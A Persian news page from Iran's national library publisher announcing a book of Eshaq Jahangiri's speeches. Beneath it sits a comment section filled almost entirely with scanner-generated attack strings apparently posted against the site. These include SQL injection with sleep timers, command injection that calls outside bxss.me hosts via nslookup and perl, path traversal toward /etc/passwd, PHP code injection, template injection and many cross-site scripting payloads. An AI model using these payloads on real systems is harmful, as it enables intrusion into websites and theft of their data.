تازه های نشر

1399/11/14 سه شنبه

انتشارات سازمان اسناد و کتابخانة‌ ملّی جمهوری اسلامی ایران، کتاب «روایتاول؛ گفتارهایی درباب توسعه ایران: مجموعه سخنرانی‌های دکتراسحاق جهانگیری، معاون اول رئیس‌جمهور (جلد پنجم: شهریور 1396 تا شهریور 1397)» را در 328 صفحه چاپ و روانه بازار نشر کرد. با انتشار این اثر تعداد منشورات سازمان به 1572 جلد رسید.

مجموعه پیش‌رو دربرگیرنده تمامی سخنانی است که در دولت دوازدهم به ضرورت بازدید معاون اول محترم رئیس جمهور از بخش‌ها و دستگاه‌ها و نهادهای دولتی، عمومی، و خصوصی و دیدارها و گفتگوها با مسئولان و دست‌اندرکاران و فعالان حوزه‌های مختلف ارائه شده است. دولت دوازهم در موقعیتی عهده‌دار مسئولیت‌های اجرایی شد که انتظارات گوناگون بخش‌های مختلف جامعه همراه با امید به بهبود در زمینه‌های مختلف اقتصادی، اجتماعی، فرهنگی، و سیاسی به‌وضوح نمایان شد. اما، متأسفانه فضای بین‌المللی و اعمال محدودیت‌ها و درنهایت، تحریم ظالمانه از یک‌سو و کاهش منابع درآمد دولت، تداوم برخی تصلب‌های ساختاری، بیماری‌های مزمن اقتصادی و اجتماعی، بروز بحران‌ها و حوادث طبیعی، و پیدایش و شیوع عوارض نوپدید و نوظهور زیستی از سوی دیگر، نگذاشت که فرایند پاسخ‌گویی به این انتظارات، صورتی طبیعی به‌خود بگیرد. در چنین شرایطی است که توجه به اهمیت و اولویت «تاب‌آوری» در همه حوزه‌ها و ساحت‌ها و اتخاذ نوعی «مدیریت بحران»، برای عبور از تنگناها برجسته شد و طبیعتاً سایه خود را بر غالب این گفتارها افکند.

این کتاب شامل 50 گفتار در حوزة فرهنگی، اقصادی، سیاسی و اجتماعی در سطح منطقه‌ای، ملی و بین‌المللی است.

علاقه‌مندان جهت تهیه این اثر می‌توانند از طریق مراجعه به فروشگاه انتشارات سازمان واقع در ساختمان کتابخانة ملی ایران، فروشگاه مجازی سازمان به آدرس http://bookshop.nlai.ir اقدام نمایند و یا با شمارة تلفن 81623277 تماس بگیرند.

ثبت نظر
نظرات
05/08/1400 02:54 ب.ظ
Mr.

1AXrRGeH

05/08/1400 02:54 ب.ظ
Mr.

1*

05/08/1400 02:54 ب.ظ
Mr.

1*

05/08/1400 02:54 ب.ظ
Mr.

1*

05/08/1400 02:54 ب.ظ
Mr.

1*

05/08/1400 02:54 ب.ظ
Mr.

-1 OR 2+844-844-1=0+0+0+1

05/08/1400 02:54 ب.ظ
Mr.

-1 OR 3+844-844-1=0+0+0+1

05/08/1400 02:54 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 02:54 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 02:55 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 02:55 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 03:06 ب.ظ
Mr.

-5) OR 951=(SELECT 951 FROM PG_SLEEP(6))--

05/08/1400 03:06 ب.ظ
Mr.

-1)) OR 303=(SELECT 303 FROM PG_SLEEP(15))--

05/08/1400 03:06 ب.ظ
Mr.

QmL6tyDR' OR 661=(SELECT 661 FROM PG_SLEEP(15))--

05/08/1400 03:06 ب.ظ
Mr.

VSJ1ohUs') OR 804=(SELECT 804 FROM PG_SLEEP(15))--

05/08/1400 03:06 ب.ظ
Mr.

SGapoLCw')) OR 448=(SELECT 448 FROM PG_SLEEP(15))--

05/08/1400 03:06 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 03:06 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 03:06 ب.ظ
Mr.

1'"

05/08/1400 03:06 ب.ظ
Mr.

1����%2527%2522

05/08/1400 03:06 ب.ظ
Mr.

@@J9VwX

05/08/1400 03:57 ب.ظ
Mr.

response.write(9806305*9973514)

05/08/1400 03:57 ب.ظ
Mr.

'+response.write(9806305*9973514)+'

05/08/1400 03:57 ب.ظ
Mr.

"+response.write(9806305*9973514)+"

05/08/1400 03:57 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 03:57 ب.ظ
Mr.

echo nmelhv$()\ dzmahg\nz^xyu||a #' &echo nmelhv$()\ dzmahg\nz^xyu||a #|" &echo nmelhv$()\ dzmahg\nz^xyu||a #

05/08/1400 03:57 ب.ظ
Mr.

&echo gzljqw$()\ zkthpr\nz^xyu||a #' &echo gzljqw$()\ zkthpr\nz^xyu||a #|" &echo gzljqw$()\ zkthpr\nz^xyu||a #

05/08/1400 03:57 ب.ظ
Mr.

|echo lrenmi$()\ hrfqsl\nz^xyu||a #' |echo lrenmi$()\ hrfqsl\nz^xyu||a #|" |echo lrenmi$()\ hrfqsl\nz^xyu||a #

05/08/1400 03:57 ب.ظ
Mr.

sSLD36yI

05/08/1400 03:57 ب.ظ
Mr.

(nslookup hitcwgvzrqmaef823d.bxss.me||perl -e "gethostbyname('hitcwgvzrqmaef823d.bxss.me')")

05/08/1400 03:57 ب.ظ
Mr.

$(nslookup hitclgumgmgbveb9de.bxss.me||perl -e "gethostbyname('hitclgumgmgbveb9de.bxss.me')")

05/08/1400 03:57 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 03:57 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 03:57 ب.ظ
Mr.

../

05/08/1400 03:57 ب.ظ
Mr.

./

05/08/1400 03:57 ب.ظ
Mr.

&(nslookup hithkfnghccws61602.bxss.me||perl -e "gethostbyname('hithkfnghccws61602.bxss.me')")&'\"`0&(nslookup hithkfnghccws61602.bxss.me||perl -e "gethostbyname('hithkfnghccws61602.bxss.me')")&`'

05/08/1400 03:57 ب.ظ
Mr.

|(nslookup hitkapoqonmbm04af5.bxss.me||perl -e "gethostbyname('hitkapoqonmbm04af5.bxss.me')")

05/08/1400 03:57 ب.ظ
Mr.

`(nslookup hittusconyhmc739a0.bxss.me||perl -e "gethostbyname('hittusconyhmc739a0.bxss.me')")`

05/08/1400 03:57 ب.ظ
Mr.

;(nslookup hitkjknwjbgjw79efb.bxss.me||perl -e "gethostbyname('hitkjknwjbgjw79efb.bxss.me')")|(nslookup hitkjknwjbgjw79efb.bxss.me||perl -e "gethostbyname('hitkjknwjbgjw79efb.bxss.me')")&(nslookup hitkjknwjbgjw79efb.bxss.me||perl -e "gethostbyname('hitkjknwjbgjw79efb.bxss.me')")

05/08/1400 03:57 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 03:57 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 03:58 ب.ظ
Mr.

${9999522+9999242}

05/08/1400 03:58 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 03:58 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 03:58 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 03:58 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 03:58 ب.ظ
Mr.

bxss.me

05/08/1400 03:58 ب.ظ
Mr.

&n936997=v980767

05/08/1400 03:58 ب.ظ
Mr.

)

05/08/1400 03:58 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 03:58 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 03:58 ب.ظ
Mr.

'"()

05/08/1400 03:58 ب.ظ
Mr.

'.gethostbyname(lc('hitep'.'vbcnsrncb3a45.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(90).chr(117).chr(66).'

05/08/1400 03:58 ب.ظ
Mr.

".gethostbyname(lc("hitug"."fxsnizul8f14e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(83).chr(121).chr(83)."

05/08/1400 03:58 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 03:58 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 03:58 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 03:58 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 03:58 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 03:58 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 03:58 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 03:58 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(102).concat(70).concat(98).concat(80)+(require"socket"
Socket.gethostbyname("hitkk"+"ngjecqipc6455.bxss.me.")[3].to_s)+"

05/08/1400 03:58 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(109).concat(69).concat(98).concat(69)+(require'socket'
Socket.gethostbyname('hitzb'+'pdrzxpdz1d2d9.bxss.me.')[3].to_s)+'

05/08/1400 03:58 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 03:58 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 03:58 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 03:58 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 03:59 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 03:59 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 03:59 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9/.

05/08/1400 03:59 ب.ظ
Mr.

'"

05/08/1400 03:59 ب.ظ
Mr.

<!--

05/08/1400 03:59 ب.ظ
Mr.

1DDDQyfQvxO

05/08/1400 03:59 ب.ظ
Mr.

'"()&%<acx><ScRiPt >Nsna(9127)</ScRiPt>

05/08/1400 03:59 ب.ظ
Mr.

'"()&%<acx><ScRiPt >Nsna(9000)</ScRiPt>

05/08/1400 03:59 ب.ظ
Mr.

9713283

05/08/1400 03:59 ب.ظ
Mr.

acu6035<s1﹥s2ʺs3ʹuca6035

05/08/1400 03:59 ب.ظ
Mr.

acux7613��z1��z2a�bcxuca7613

05/08/1400 03:59 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:00 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:00 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:00 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:00 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:00 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:00 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:00 ب.ظ
Mr.

<ScRiPt >Nsna(9443)</ScRiPt>

05/08/1400 04:00 ب.ظ
Mr.

<W5ATSH>NU5II[!+!]</W5ATSH>

05/08/1400 04:00 ب.ظ
Mr.

<script>Nsna(9560)</script>

05/08/1400 04:00 ب.ظ
Mr.

<ScR<ScRiPt>IpT>Nsna(9852)</sCr<ScRiPt>IpT>

05/08/1400 04:00 ب.ظ
Mr.

<ScRiPt
>Nsna(9020)</ScRiPt>

05/08/1400 04:00 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9984></ScRiPt>

05/08/1400 04:00 ب.ظ
Mr.

<ScRiPt
>Nsna(9499)</ScRiPt>

05/08/1400 04:00 ب.ظ
Mr.

<svg  

�onload=Nsna(9480);>

05/08/1400 04:01 ب.ظ
Mr.

<isindex type=image src=1 onerror=Nsna(9617)>

05/08/1400 04:01 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9046'>

05/08/1400 04:01 ب.ظ
Mr.

<body onload=Nsna(9102)>

05/08/1400 04:01 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=Nsna(9485)>

05/08/1400 04:01 ب.ظ
Mr.

<img src=xyz OnErRor=Nsna(9641)>

05/08/1400 04:01 ب.ظ
Mr.

<img/src=">" onerror=alert(9416)>

05/08/1400 04:01 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%4E%73%6E%61%289104%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:01 ب.ظ
Mr.

\u003CScRiPt\Nsna(9099)\u003C/sCripT\u003E

05/08/1400 04:01 ب.ظ
Mr.

&lt;ScRiPt&gt;Nsna(9037)&lt;/sCripT&gt;

05/08/1400 04:01 ب.ظ
Mr.

�<img acu onmouseover=Nsna(92511) //�>

05/08/1400 04:01 ب.ظ
Mr.

<input autofocus onfocus=Nsna(9973)>

05/08/1400 04:01 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:01 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:01 ب.ظ
Mr.

}body{acu:Expre/**/SSion(Nsna(9762))}

05/08/1400 04:02 ب.ظ
Mr.

<% contenteditable onresize=Nsna(9196)>

05/08/1400 04:02 ب.ظ
Mr.

MFXuP
<ScRiPt >Nsna(9653)</ScRiPt>

05/08/1400 04:02 ب.ظ
Mr.

<WHZOCU>RGK6S[!+!]</WHZOCU>

05/08/1400 04:02 ب.ظ
Mr.

<ifRAme sRc=9434.com></IfRamE>

05/08/1400 04:02 ب.ظ
Mr.

<r3KTZP x=9337>

05/08/1400 04:02 ب.ظ
Mr.

<img sRc='http://attacker-9739/log.php?

05/08/1400 04:03 ب.ظ
Mr.

<r24TA9<

05/08/1400 04:07 ب.ظ
Mr.

WG9HtDoj

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

1*

05/08/1400 04:07 ب.ظ
Mr.

-1 OR 2+966-966-1=0+0+0+1

05/08/1400 04:07 ب.ظ
Mr.

-1 OR 3+966-966-1=0+0+0+1

05/08/1400 04:07 ب.ظ
Mr.

1'"

05/08/1400 04:07 ب.ظ
Mr.

1����%2527%2522

05/08/1400 04:07 ب.ظ
Mr.

@@oQGEy

05/08/1400 04:11 ب.ظ
Mr.

'"()&%<acx><ScRiPt >WAlt(9132)</ScRiPt>

05/08/1400 04:11 ب.ظ
Mr.

'"()&%<acx><ScRiPt >WAlt(9013)</ScRiPt>

05/08/1400 04:11 ب.ظ
Mr.

9145458

05/08/1400 04:11 ب.ظ
Mr.

acu10494<s1﹥s2ʺs3ʹuca10494

05/08/1400 04:11 ب.ظ
Mr.

acux10857��z1��z2a�bcxuca10857

05/08/1400 04:11 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:12 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:12 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:12 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:12 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:12 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:12 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:12 ب.ظ
Mr.

<ScRiPt >WAlt(9439)</ScRiPt>

05/08/1400 04:12 ب.ظ
Mr.

<WV7UBE>P0UM8[!+!]</WV7UBE>

05/08/1400 04:13 ب.ظ
Mr.

<script>WAlt(9279)</script>

05/08/1400 04:13 ب.ظ
Mr.

<ScR<ScRiPt>IpT>WAlt(9141)</sCr<ScRiPt>IpT>

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt
>WAlt(9367)</ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9238></ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<ScRiPt
>WAlt(9928)</ScRiPt>

05/08/1400 04:13 ب.ظ
Mr.

<svg  

�onload=WAlt(9367);>

05/08/1400 04:14 ب.ظ
Mr.

<isindex type=image src=1 onerror=WAlt(9508)>

05/08/1400 04:14 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9232'>

05/08/1400 04:14 ب.ظ
Mr.

<body onload=WAlt(9399)>

05/08/1400 04:14 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=WAlt(9386)>

05/08/1400 04:14 ب.ظ
Mr.

<img src=xyz OnErRor=WAlt(9604)>

05/08/1400 04:14 ب.ظ
Mr.

<img/src=">" onerror=alert(9097)>

05/08/1400 04:14 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%57%41%6C%74%289708%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:15 ب.ظ
Mr.

\u003CScRiPt\WAlt(9035)\u003C/sCripT\u003E

05/08/1400 04:15 ب.ظ
Mr.

&lt;ScRiPt&gt;WAlt(9692)&lt;/sCripT&gt;

05/08/1400 04:15 ب.ظ
Mr.

�<img acu onmouseover=WAlt(99111) //�>

05/08/1400 04:15 ب.ظ
Mr.

<input autofocus onfocus=WAlt(9565)>

05/08/1400 04:15 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:15 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:16 ب.ظ
Mr.

}body{acu:Expre/**/SSion(WAlt(9497))}

05/08/1400 04:16 ب.ظ
Mr.

<% contenteditable onresize=WAlt(9361)>

05/08/1400 04:16 ب.ظ
Mr.

xb5TD
<ScRiPt >WAlt(9087)</ScRiPt>

05/08/1400 04:16 ب.ظ
Mr.

<WPDKCX>AV8BF[!+!]</WPDKCX>

05/08/1400 04:16 ب.ظ
Mr.

<ifRAme sRc=9432.com></IfRamE>

05/08/1400 04:16 ب.ظ
Mr.

<W679ow x=9923>

05/08/1400 04:16 ب.ظ
Mr.

<img sRc='http://attacker-9351/log.php?

05/08/1400 04:16 ب.ظ
Mr.

<RY1RP9<

05/08/1400 04:27 ب.ظ
Mr.

response.write(9397219*9757716)

05/08/1400 04:27 ب.ظ
Mr.

'+response.write(9397219*9757716)+'

05/08/1400 04:27 ب.ظ
Mr.

"+response.write(9397219*9757716)+"

05/08/1400 04:27 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 04:28 ب.ظ
Mr.

echo fbsgkf$()\ zlmfmc\nz^xyu||a #' &echo fbsgkf$()\ zlmfmc\nz^xyu||a #|" &echo fbsgkf$()\ zlmfmc\nz^xyu||a #

05/08/1400 04:28 ب.ظ
Mr.

&echo sjgvye$()\ tkgsgt\nz^xyu||a #' &echo sjgvye$()\ tkgsgt\nz^xyu||a #|" &echo sjgvye$()\ tkgsgt\nz^xyu||a #

05/08/1400 04:28 ب.ظ
Mr.

|echo gbkrot$()\ eevgjz\nz^xyu||a #' |echo gbkrot$()\ eevgjz\nz^xyu||a #|" |echo gbkrot$()\ eevgjz\nz^xyu||a #

05/08/1400 04:28 ب.ظ
Mr.

(nslookup hitnnagdgolds8309d.bxss.me||perl -e "gethostbyname('hitnnagdgolds8309d.bxss.me')")

05/08/1400 04:28 ب.ظ
Mr.

$(nslookup hitgjpppcsfleff5a9.bxss.me||perl -e "gethostbyname('hitgjpppcsfleff5a9.bxss.me')")

05/08/1400 04:28 ب.ظ
Mr.

&(nslookup hitfdumbnozpv30ec0.bxss.me||perl -e "gethostbyname('hitfdumbnozpv30ec0.bxss.me')")&'\"`0&(nslookup hitfdumbnozpv30ec0.bxss.me||perl -e "gethostbyname('hitfdumbnozpv30ec0.bxss.me')")&`'

05/08/1400 04:28 ب.ظ
Mr.

|(nslookup hitrqclviiadr790a1.bxss.me||perl -e "gethostbyname('hitrqclviiadr790a1.bxss.me')")

05/08/1400 04:28 ب.ظ
Mr.

`(nslookup hitbmbnepvccea9426.bxss.me||perl -e "gethostbyname('hitbmbnepvccea9426.bxss.me')")`

05/08/1400 04:28 ب.ظ
Mr.

kDzoZq6Q

05/08/1400 04:28 ب.ظ
Mr.

;(nslookup hitqbmxggvrcmcae7e.bxss.me||perl -e "gethostbyname('hitqbmxggvrcmcae7e.bxss.me')")|(nslookup hitqbmxggvrcmcae7e.bxss.me||perl -e "gethostbyname('hitqbmxggvrcmcae7e.bxss.me')")&(nslookup hitqbmxggvrcmcae7e.bxss.me||perl -e "gethostbyname('hitqbmxggvrcmcae7e.bxss.me')")

05/08/1400 04:28 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 04:28 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 04:28 ب.ظ
Mr.

../

05/08/1400 04:28 ب.ظ
Mr.

./

05/08/1400 04:29 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 04:29 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 04:29 ب.ظ
Mr.

${10000153+10000038}

05/08/1400 04:29 ب.ظ
Mr.

&n963364=v957962

05/08/1400 04:29 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 04:29 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 04:29 ب.ظ
Mr.

)

05/08/1400 04:29 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 04:29 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 04:29 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 04:29 ب.ظ
Mr.

bxss.me

05/08/1400 04:29 ب.ظ
Mr.

'"()

05/08/1400 04:29 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 04:30 ب.ظ
Mr.

'.gethostbyname(lc('hitvx'.'tuzlggcx22fb4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(89).chr(110).chr(73).'

05/08/1400 04:30 ب.ظ
Mr.

".gethostbyname(lc("hitmj"."hwultjap768f2.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(77).chr(97).chr(68)."

05/08/1400 04:30 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 04:30 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 04:30 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 04:30 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 04:30 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 04:30 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 04:30 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 04:30 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 04:30 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 04:30 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 04:30 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 04:30 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9/.

05/08/1400 04:30 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(120).concat(89).concat(110).concat(80)+(require"socket"
Socket.gethostbyname("hitty"+"ejveqcpaa9656.bxss.me.")[3].to_s)+"

05/08/1400 04:30 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(106).concat(89).concat(115).concat(80)+(require'socket'
Socket.gethostbyname('hittl'+'mhpzzjjf15aeb.bxss.me.')[3].to_s)+'

05/08/1400 04:30 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 04:30 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 04:30 ب.ظ
Mr.

'"

05/08/1400 04:30 ب.ظ
Mr.

<!--

05/08/1400 04:30 ب.ظ
Mr.

'"()&%<acx><ScRiPt >ug58(9232)</ScRiPt>

05/08/1400 04:30 ب.ظ
Mr.

'"()&%<acx><ScRiPt >ug58(9707)</ScRiPt>

05/08/1400 04:30 ب.ظ
Mr.

9090901

05/08/1400 04:31 ب.ظ
Mr.

acu10035<s1﹥s2ʺs3ʹuca10035

05/08/1400 04:31 ب.ظ
Mr.

acux1821��z1��z2a�bcxuca1821

05/08/1400 04:31 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:31 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:31 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:31 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:31 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:31 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:31 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:31 ب.ظ
Mr.

<ScRiPt >ug58(9223)</ScRiPt>

05/08/1400 04:31 ب.ظ
Mr.

<WNJFLP>J9TP8[!+!]</WNJFLP>

05/08/1400 04:31 ب.ظ
Mr.

<script>ug58(9706)</script>

05/08/1400 04:31 ب.ظ
Mr.

<ScR<ScRiPt>IpT>ug58(9317)</sCr<ScRiPt>IpT>

05/08/1400 04:32 ب.ظ
Mr.

<ScRiPt
>ug58(9696)</ScRiPt>

05/08/1400 04:32 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9348></ScRiPt>

05/08/1400 04:32 ب.ظ
Mr.

<ScRiPt
>ug58(9613)</ScRiPt>

05/08/1400 04:32 ب.ظ
Mr.

<svg  

�onload=ug58(9617);>

05/08/1400 04:32 ب.ظ
Mr.

<isindex type=image src=1 onerror=ug58(9190)>

05/08/1400 04:32 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9877'>

05/08/1400 04:32 ب.ظ
Mr.

<body onload=ug58(9405)>

05/08/1400 04:32 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=ug58(9975)>

05/08/1400 04:32 ب.ظ
Mr.

<img src=xyz OnErRor=ug58(9987)>

05/08/1400 04:32 ب.ظ
Mr.

<img/src=">" onerror=alert(9989)>

05/08/1400 04:32 ب.ظ
Mr.

%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%75%67%35%38%289611%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:33 ب.ظ
Mr.

\u003CScRiPt\ug58(9119)\u003C/sCripT\u003E

05/08/1400 04:33 ب.ظ
Mr.

&lt;ScRiPt&gt;ug58(9617)&lt;/sCripT&gt;

05/08/1400 04:33 ب.ظ
Mr.

�<img acu onmouseover=ug58(90101) //�>

05/08/1400 04:33 ب.ظ
Mr.

<input autofocus onfocus=ug58(9956)>

05/08/1400 04:33 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:33 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:33 ب.ظ
Mr.

}body{acu:Expre/**/SSion(ug58(9928))}

05/08/1400 04:33 ب.ظ
Mr.

<% contenteditable onresize=ug58(9943)>

05/08/1400 04:33 ب.ظ
Mr.

P2R1m
<ScRiPt >ug58(9797)</ScRiPt>

05/08/1400 04:33 ب.ظ
Mr.

<WFHF3M>XS2XX[!+!]</WFHF3M>

05/08/1400 04:33 ب.ظ
Mr.

<ifRAme sRc=9529.com></IfRamE>

05/08/1400 04:33 ب.ظ
Mr.

<6PULzC x=9293>

05/08/1400 04:34 ب.ظ
Mr.

<img sRc='http://attacker-9701/log.php?

05/08/1400 04:34 ب.ظ
Mr.

<RdSxbQ<

05/08/1400 05:37 ب.ظ
Mr.

pKAvRitB

05/08/1400 05:37 ب.ظ
Mr.

1*

05/08/1400 05:37 ب.ظ
Mr.

1*

05/08/1400 05:37 ب.ظ
Mr.

1*

05/08/1400 05:37 ب.ظ
Mr.

1*

05/08/1400 05:37 ب.ظ
Mr.

-1 OR 2+791-791-1=0+0+0+1

05/08/1400 05:37 ب.ظ
Mr.

-1 OR 3+791-791-1=0+0+0+1

05/08/1400 05:37 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 05:37 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 05:37 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 05:37 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

